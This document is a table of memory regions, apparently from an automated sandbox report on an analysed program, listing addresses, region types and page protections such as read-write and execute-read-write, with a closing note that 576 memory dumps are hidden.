page read and write
|
||
|
3340000
|
direct allocation
|
page read and write
|
||
|
7FFB4A170000
|
trusted library allocation
|
page read and write
|
||
|
28E7A508000
|
heap
|
page read and write
|
||
|
2B327FF000
|
stack
|
page read and write
|
||
|
7FFB4A150000
|
trusted library allocation
|
page read and write
|
||
|
21AE8402000
|
trusted library allocation
|
page read and write
|
||
|
28E78460000
|
heap
|
page read and write
|
||
|
28E78547000
|
heap
|
page read and write
|
||
|
7FFB4A0E0000
|
trusted library allocation
|
page read and write
|
||
|
2025DB71000
|
trusted library allocation
|
page read and write
|
||
|
19C57F05000
|
heap
|
page read and write
|
||
|
2024DC67000
|
trusted library allocation
|
page read and write
|
||
|
28E79FB9000
|
heap
|
page read and write
|
||
|
7FFB4A1F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A100000
|
trusted library allocation
|
page read and write
|
||
|
36A1000
|
direct allocation
|
page execute and read and write
|
||
|
7FFB4A270000
|
trusted library allocation
|
page read and write
|
||
|
20265E00000
|
heap
|
page read and write
|
||
|
28E787CD000
|
heap
|
page read and write
|
||
|
28E7A5DE000
|
heap
|
page read and write
|
||
|
21AF7005000
|
trusted library allocation
|
page read and write
|
||
|
19C59AE0000
|
heap
|
page read and write
|
||
|
19C59F9F000
|
trusted library allocation
|
page read and write
|
||
|
28E7A480000
|
heap
|
page read and write
|
||
|
28E7A046000
|
heap
|
page read and write
|
||
|
28E787C0000
|
heap
|
page read and write
|
||
|
7FFB4A0F0000
|
trusted library allocation
|
page read and write
|
||
|
28E79FFD000
|
heap
|
page read and write
|
||
|
21AE8082000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49F76000
|
trusted library allocation
|
page read and write
|
||
|
372C3FD000
|
stack
|
page read and write
|
||
|
21AF6760000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A231000
|
trusted library allocation
|
page read and write
|
||
|
E3207FE000
|
stack
|
page read and write
|
||
|
7FFB49EB3000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB4A090000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E79FD5000
|
heap
|
page read and write
|
||
|
7FFB4A070000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E7A048000
|
heap
|
page read and write
|
||
|
7FFB4A1B0000
|
trusted library allocation
|
page read and write
|
||
|
19C5A346000
|
trusted library allocation
|
page read and write
|
||
|
21AE6580000
|
heap
|
page read and write
|
||
|
7FFB49EBD000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C57E80000
|
heap
|
page read and write
|
||
|
2E75000
|
heap
|
page read and write
|
||
|
28E787CE000
|
heap
|
page read and write
|
||
|
21AF67CD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A160000
|
trusted library allocation
|
page read and write
|
||
|
19C71E45000
|
heap
|
page read and write
|
||
|
7FFB4A170000
|
trusted library allocation
|
page read and write
|
||
|
21AE61B0000
|
heap
|
page read and write
|
||
|
19C58150000
|
heap
|
page execute and read and write
|
||
|
21AE7E6B000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49EC4000
|
trusted library allocation
|
page read and write
|
||
|
21AE6D37000
|
trusted library allocation
|
page read and write
|
||
|
19C57E92000
|
heap
|
page read and write
|
||
|
20265C86000
|
heap
|
page execute and read and write
|
||
|
2024BC50000
|
heap
|
page read and write
|
||
|
28E784CF000
|
heap
|
page read and write
|
||
|
369D000
|
direct allocation
|
page execute and read and write
|
||
|
28E78589000
|
heap
|
page read and write
|
||
|
3340000
|
direct allocation
|
page read and write
|
||
|
7FFB4A100000
|
trusted library allocation
|
page read and write
|
||
|
21AE6B6F000
|
trusted library allocation
|
page read and write
|
||
|
21AE6751000
|
trusted library allocation
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
28E7A4F9000
|
heap
|
page read and write
|
||
|
7FFB4A120000
|
trusted library allocation
|
page read and write
|
||
|
19C59E41000
|
trusted library allocation
|
page read and write
|
||
|
21AE7E67000
|
trusted library allocation
|
page read and write
|
||
|
28E79FDD000
|
heap
|
page read and write
|
||
|
21AE61B4000
|
heap
|
page read and write
|
||
|
28E78543000
|
heap
|
page read and write
|
||
|
21AF6F49000
|
trusted library allocation
|
page read and write
|
||
|
28E79FA1000
|
heap
|
page read and write
|
||
|
7FFB49F96000
|
trusted library allocation
|
page execute and read and write
|
||
|
3225000
|
heap
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
7FFB4A0B0000
|
trusted library allocation
|
page read and write
|
||
|
19C5A2C8000
|
trusted library allocation
|
page read and write
|
||
|
19C59AF5000
|
heap
|
page read and write
|
||
|
28E78554000
|
heap
|
page read and write
|
||
|
7FFB4A170000
|
trusted library allocation
|
page read and write
|
||
|
28E78548000
|
heap
|
page read and write
|
||
|
7FFB4A1E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A071000
|
trusted library allocation
|
page read and write
|
||
|
2024DC5D000
|
trusted library allocation
|
page read and write
|
||
|
20265D20000
|
heap
|
page read and write
|
||
|
7FFB49F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
3079000
|
heap
|
page read and write
|
||
|
28E7A503000
|
heap
|
page read and write
|
||
|
2E40000
|
heap
|
page read and write
|
||
|
7FFB4A181000
|
trusted library allocation
|
page read and write
|
||
|
2024DC4F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
372D48D000
|
stack
|
page read and write
|
||
|
2024DCA0000
|
trusted library allocation
|
page read and write
|
||
|
28E7A036000
|
heap
|
page read and write
|
||
|
2024D530000
|
heap
|
page readonly
|
||
|
21AE6530000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A110000
|
trusted library allocation
|
page read and write
|
||
|
2024E05C000
|
trusted library allocation
|
page read and write
|
||
|
28E7A03E000
|
heap
|
page read and write
|
||
|
6C0C2BF000
|
stack
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
2024BD56000
|
heap
|
page read and write
|
||
|
28E7854A000
|
heap
|
page read and write
|
||
|
7FFB4A26C000
|
trusted library allocation
|
page read and write
|
||
|
21AFE79A000
|
heap
|
page read and write
|
||
|
7FFB49EB2000
|
trusted library allocation
|
page read and write
|
||
|
21AE48C0000
|
heap
|
page read and write
|
||
|
2B32B36000
|
stack
|
page read and write
|
||
|
19C59EC2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
28E787C8000
|
heap
|
page read and write
|
||
|
7FFB4A052000
|
trusted library allocation
|
page read and write
|
||
|
21AE4800000
|
heap
|
page read and write
|
||
|
372C9BB000
|
stack
|
page read and write
|
||
|
19C71E40000
|
heap
|
page read and write
|
||
|
7FFB49F1C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2024DC61000
|
trusted library allocation
|
page read and write
|
||
|
28E7A4CC000
|
heap
|
page read and write
|
||
|
2024DC6A000
|
trusted library allocation
|
page read and write
|
||
|
19C59EDC000
|
trusted library allocation
|
page read and write
|
||
|
2B3277E000
|
stack
|
page read and write
|
||
|
7FFB49FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
20265BAE000
|
heap
|
page read and write
|
||
|
28E7854C000
|
heap
|
page read and write
|
||
|
7FFB4A210000
|
trusted library allocation
|
page read and write
|
||
|
28E78583000
|
heap
|
page read and write
|
||
|
2024BC9A000
|
heap
|
page read and write
|
||
|
28E7A4F8000
|
heap
|
page read and write
|
||
|
7FFB49EB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1B0000
|
trusted library allocation
|
page read and write
|
||
|
3340000
|
direct allocation
|
page read and write
|
||
|
7FFB4A130000
|
trusted library allocation
|
page read and write
|
||
|
21AFED80000
|
trusted library section
|
page read and write
|
||
|
7FFB4A150000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A0D0000
|
trusted library allocation
|
page read and write
|
||
|
2024DF1A000
|
trusted library allocation
|
page read and write
|
||
|
19C59F98000
|
trusted library allocation
|
page read and write
|
||
|
28E787CE000
|
heap
|
page read and write
|
||
|
6C0C07E000
|
stack
|
page read and write
|
||
|
2B32CBE000
|
stack
|
page read and write
|
||
|
28E7A036000
|
heap
|
page read and write
|
||
|
6C0BEFE000
|
stack
|
page read and write
|
||
|
7FFB49F70000
|
trusted library allocation
|
page read and write
|
||
|
28E7A036000
|
heap
|
page read and write
|
||
|
19C57ECB000
|
heap
|
page read and write
|
||
|
19C59E5F000
|
trusted library allocation
|
page read and write
|
||
|
21AFE761000
|
heap
|
page read and write
|
||
|
2E7F000
|
heap
|
page read and write
|
||
|
21AFE900000
|
heap
|
page read and write
|
||
|
28E7A5DF000
|
heap
|
page read and write
|
||
|
372C63E000
|
stack
|
page read and write
|
||
|
20265C14000
|
heap
|
page read and write
|
||
|
19C59F62000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A180000
|
trusted library allocation
|
page read and write
|
||
|
28E7A01F000
|
heap
|
page read and write
|
||
|
28E79FC1000
|
heap
|
page read and write
|
||
|
2E77000
|
heap
|
page read and write
|
||
|
7FFB49F76000
|
trusted library allocation
|
page read and write
|
||
|
372BFF3000
|
stack
|
page read and write
|
||
|
7FFB4A06A000
|
trusted library allocation
|
page read and write
|
||
|
33C3000
|
heap
|
page read and write
|
||
|
28E79FEE000
|
heap
|
page read and write
|
||
|
7FFB4A180000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A110000
|
trusted library allocation
|
page read and write
|
||
|
19C59E5B000
|
trusted library allocation
|
page read and write
|
||
|
E320DFE000
|
stack
|
page read and write
|
||
|
28E7A046000
|
heap
|
page read and write
|
||
|
372C47E000
|
stack
|
page read and write
|
||
|
31AD000
|
stack
|
page read and write
|
||
|
28E787CE000
|
heap
|
page read and write
|
||
|
21AFE7A3000
|
heap
|
page read and write
|
||
|
28E79FF1000
|
heap
|
page read and write
|
||
|
28E78585000
|
heap
|
page read and write
|
||
|
28E787CC000
|
heap
|
page read and write
|
||
|
28E78490000
|
heap
|
page read and write
|
||
|
7FFB4A140000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49ECB000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A074000
|
trusted library allocation
|
page read and write
|
||
|
19C59AF0000
|
heap
|
page read and write
|
||
|
7FFB4A080000
|
trusted library allocation
|
page execute and read and write
|
||
|
33D0000
|
direct allocation
|
page execute and read and write
|
||
|
E320FFE000
|
stack
|
page read and write
|
||
|
372C57E000
|
stack
|
page read and write
|
||
|
E320BFF000
|
stack
|
page read and write
|
||
|
7FFB49F70000
|
trusted library allocation
|
page read and write
|
||
|
21AFE8D0000
|
heap
|
page execute and read and write
|
||
|
19C57DF0000
|
heap
|
page read and write
|
||
|
21AE6972000
|
trusted library allocation
|
page read and write
|
||
|
21AE48E7000
|
heap
|
page read and write
|
||
|
21AE6B43000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49FA6000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB49ED0000
|
trusted library allocation
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
21AE8061000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A110000
|
trusted library allocation
|
page read and write
|
||
|
372C4FE000
|
stack
|
page read and write
|
||
|
3070000
|
heap
|
page read and write
|
||
|
3170000
|
direct allocation
|
page read and write
|
||
|
7FFB4A0C0000
|
trusted library allocation
|
page read and write
|
||
|
2B329FF000
|
stack
|
page read and write
|
||
|
E3210FB000
|
stack
|
page read and write
|
||
|
28E7A012000
|
heap
|
page read and write
|
||
|
21AE6B4D000
|
trusted library allocation
|
page read and write
|
||
|
28E7A046000
|
heap
|
page read and write
|
||
|
21AE7E1F000
|
trusted library allocation
|
page read and write
|
||
|
28E7A580000
|
heap
|
page read and write
|
||
|
2024E16E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1C0000
|
trusted library allocation
|
page read and write
|
||
|
21AE47E0000
|
heap
|
page read and write
|
||
|
7FFB4A0C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB4A1C0000
|
trusted library allocation
|
page read and write
|
||
|
28E7A4FC000
|
heap
|
page read and write
|
||
|
19C5A14C000
|
trusted library allocation
|
page read and write
|
||
|
28E7A026000
|
heap
|
page read and write
|
||
|
28E7850B000
|
heap
|
page read and write
|
||
|
372C93E000
|
stack
|
page read and write
|
||
|
21AFE81D000
|
heap
|
page read and write
|
||
|
21AFE9E0000
|
heap
|
page read and write
|
||
|
28E7854E000
|
heap
|
page read and write
|
||
|
7FFB49ED0000
|
trusted library allocation
|
page read and write
|
||
|
2024BBD0000
|
heap
|
page read and write
|
||
|
19C57E87000
|
heap
|
page read and write
|
||
|
7FFB4A0E0000
|
trusted library allocation
|
page read and write
|
||
|
2E80000
|
heap
|
page read and write
|
||
|
21AFEC30000
|
heap
|
page read and write
|
||
|
28E78499000
|
heap
|
page read and write
|
||
|
21AE4900000
|
heap
|
page read and write
|
||
|
7FFB4A1D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB49F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
21AF716A000
|
trusted library allocation
|
page read and write
|
||
|
32EE000
|
stack
|
page read and write
|
||
|
28E7A006000
|
heap
|
page read and write
|
||
|
3340000
|
direct allocation
|
page read and write
|
||
|
28E78660000
|
heap
|
page read and write
|
||
|
7FFB4A0D0000
|
trusted library allocation
|
page read and write
|
||
|
6C0BCFD000
|
stack
|
page read and write
|
||
|
28E7A042000
|
heap
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
2024DBBE000
|
trusted library allocation
|
page read and write
|
||
|
21AE6D47000
|
trusted library allocation
|
page read and write
|
||
|
372C5F9000
|
stack
|
page read and write
|
||
|
2024DB87000
|
trusted library allocation
|
page read and write
|
||
|
21AFE8D6000
|
heap
|
page execute and read and write
|
||
|
2024DB61000
|
trusted library allocation
|
page read and write
|
||
|
6C0BC72000
|
stack
|
page read and write
|
||
|
28E7A034000
|
heap
|
page read and write
|
||
|
21AFE750000
|
heap
|
page read and write
|
||
|
2024DC64000
|
trusted library allocation
|
page read and write
|
||
|
6C0BD7E000
|
stack
|
page read and write
|
||
|
28E7854D000
|
heap
|
page read and write
|
||
|
2024DBE5000
|
trusted library allocation
|
page read and write
|
||
|
19C59F4B000
|
trusted library allocation
|
page read and write
|
||
|
3340000
|
direct allocation
|
page read and write
|
||
|
E3208FE000
|
stack
|
page read and write
|
||
|
28E7A030000
|
heap
|
page read and write
|
||
|
21AF7B6A000
|
trusted library allocation
|
page read and write
|
||
|
2024DB20000
|
heap
|
page execute and read and write
|
||
|
2024DB50000
|
heap
|
page execute and read and write
|
||
|
7FFB4A07A000
|
trusted library allocation
|
page read and write
|
||
|
2024DBAB000
|
trusted library allocation
|
page read and write
|
There are 576 hidden memdumps, click here to show them.